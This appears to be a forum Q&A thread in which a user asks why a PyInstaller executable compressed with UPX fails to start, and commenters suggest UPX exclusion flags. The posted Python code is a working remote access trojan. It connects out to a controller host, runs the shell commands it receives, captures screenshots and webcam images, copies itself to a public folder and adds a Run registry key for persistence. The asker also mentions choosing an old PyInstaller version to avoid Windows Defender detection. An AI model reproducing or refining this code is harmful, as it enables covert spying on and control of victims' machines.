# Pyinstaller compiled exe with upx gives error "Failed to execute script"

Tags: python, pyinstaller

I tried to reduce the size of my exe made with pyinstaller and upx but I get this error on execute, I tried googling the solution but can't seem to figure out the problem
The error it gives is :

```
Traceback (most recent call last):
  File "main.py", line 6, in <module>
  File "c:\users\dontmessup\main\lib\site-packages\PyInstaller\loader\pyimod03_i
mporters.py", line 627, in exec_module
    exec(bytecode, module.__dict__)
  File "lib\site-packages\cv2\__init__.py", line 5, in <module>
ImportError: DLL load failed: Invalid access to memory location.
[4192] Failed to execute script main
```

Any help would be appreciated

EDIT : My program made with pyinstaller without upx works, I wanted help about how to find what is causing this error and any solutions for this problem.

Py Code :

```
import subprocess
import socket
import sys
import time
import pyautogui as pag
import cv2

s = socket.socket()
host = "<IP HERE>"
port = 42069

def logic():
    command = s.recv(1024)
    command = command.decode()
    if command == "shell":
        command_recieve()
    if command == "screenshot":
        screenshot()
    if command == "camera":
        camera()
    if command == "schedule":
        schedule()
    if command == "break":
        break1()
    if command == "end":
        end1()
    if command == "backdoor":
        backdoor()
    if command == "copy":
        copy()
    else:
        logic()

#thisisacomment
def tryconnect():
    try:
        s.connect((host, port))
        print("Connected")
    except:
        print("Failed")
        tryconnect()

def end1():
    sys.exit()

def break1():
    msg = "powershell -W hidden -command main.exe"
    subprocess.Popen(msg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)
    time.sleep(3)
    sys.exit()

def backdoor():
    msg = r"powershell -W hidden -command start C:\Users\Public\main.exe"
    subprocess.Popen(msg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)
    sys.exit()

def copy():
    msg = r'powershell -W hidden -command copy-item main.exe -Force -D C:\Users\Public\main.exe'

    subprocess.Popen(msg, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)
    return logic()

def schedule():
    command = s.recv(9000)
    command = command.decode()
    if command == "break":
        return logic()
    if command == "pass":
        pass
    msg = r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\Users\Public\main.exe"'
    with open('output.txt', 'w') as f:
        subprocess.run(msg, stdout=f, stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)
    filename = 'output.txt'
    file = open(filename, 'rb')
    file_data = file.read(1024)
    s.send(file_data)
    return logic()

def screenshot():
    snap = pag.screenshot()
    snap.save("screenshot.png")

    filename = 'screenshot.png'
    file = open(filename, 'rb')
    file_data = file.read(400000)
    s.send(file_data)
    print("Screenshot send")

def camera():
    try:
        cam = cv2.VideoCapture(0, cv2.CAP_DSHOW)
        ret, frame = cam.read(time.sleep(1))
        img_name = "photo.png"
        cv2.imwrite(img_name, frame)
        cam.release()
        msg = "pass"
        s.send(msg.encode())
        filename = 'photo.png'
        file = open(filename, 'rb')
        file_data = file.read(400000)
        s.send(file_data)
        logic()
    except:
        msg = "error"
        s.send(msg.encode())
        logic()

def command_recieve():
    command = s.recv(1024)
    command = command.decode()
    print("Recieved Command")

    if command == "break":
        return logic()

    p1 = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)

    ff = p1.stdout.decode()
    s.send(ff.encode())
    print("File has been sent")
    command_recieve()

tryconnect()
logic()
```

Comment: What version of PyInstaller you're using?

Comment: You haven't said if the generated EXE works without UPX. UPX always seems silly to me because (1) the "savings" is small and (2) the "savings" completely disappears and then some when you try to run your EXE file and it decompresses to a temporary location. So you actually end up consuming more disk space. The error you're getting is related to a DLL. Is it included in the datas in your spec file? Does the DLL need to be registered on the target machine? Are there other DLLs that the DLL is dependent on that also need to be included?

Comment: @bfris yep the generated EXE without UPX works. I wanted help on what dll should be excluded with the pyinstaller command line. I can share the entire code if it is required. Thank you.

Comment: @gfdsweds I am using pyinstaller version 3.4 because any version above that is being flagged by windows defender.

Comment: in your case, adding [`--upx-exclude`](https://pyinstaller.readthedocs.io/en/stable/usage.html#cmdoption-upx-exclude) might work, for example: `--upx-exclude cv2.cp39-win_amd64.pyd`

Comment: @gfdsweds Yes I have found that solution on the internet but I cant figure out what to exlcude to make my program work, Is there any way to find that out. Thanks for any help :)